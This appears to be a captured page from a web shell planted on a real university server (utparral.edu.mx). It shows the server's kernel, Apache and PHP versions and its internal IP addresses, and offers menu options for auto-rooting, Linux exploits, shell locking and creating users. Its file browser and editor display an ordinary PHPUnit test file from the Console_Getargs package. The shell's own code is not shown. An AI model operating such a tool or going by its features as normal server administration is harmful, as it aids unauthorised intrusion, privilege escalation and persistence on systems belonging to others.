Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Console_Getargs /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
AllTests.php
2.1
KB
-rw-r--r--
Getargs_basic_testcase.php
15.55
KB
-rw-r--r--
Getargs_getValues_testcase.php
9.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AllTests.php
<?php /* vim: set expandtab tabstop=4 shiftwidth=4: */ // +----------------------------------------------------------------------+ // | PHP Version 4 | // +----------------------------------------------------------------------+ // | Copyright (c) 2004 The PHP Group | // +----------------------------------------------------------------------+ // | This source file is subject to version 3.0 of the PHP license, | // | that is bundled with this package in the file LICENSE, and is | // | available through the world-wide-web at the following url: | // | http://www.php.net/license/3_0.txt. | // | If you did not receive a copy of the PHP license and are unable to | // | obtain it through the world-wide-web, please send a note to | // | license@php.net so we can mail you a copy immediately. | // +----------------------------------------------------------------------+ // | Author: Bertrand Mansion <bmansion@mamasam.com> | // +----------------------------------------------------------------------+ // // $Id: AllTests.php 294988 2010-02-12 04:57:14Z clockwerx $ /** * Unit tests for Console_Getargs package. */ if (!defined('PHPUnit_MAIN_METHOD')) { define('PHPUnit_MAIN_METHOD', 'Console_Getargs_AllTests::main'); } require_once 'PHPUnit/TextUI/TestRunner.php'; chdir(dirname(__FILE__) . '/../'); require_once 'Getargs_basic_testcase.php'; require_once 'Getargs_getValues_testcase.php'; class Console_Getargs_AllTests { public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } public static function suite() { $suite = new PHPUnit_Framework_TestSuite('Console_Getargs Tests'); /** Add testsuites, if there is. */ $suite->addTestSuite('Getargs_basic_testcase'); $suite->addTestSuite('Getargs_getValues_testcase'); return $suite; } } if (PHPUnit_MAIN_METHOD == 'Console_Getargs_AllTests::main') { Console_Getargs_AllTests::main(); } ?>
Close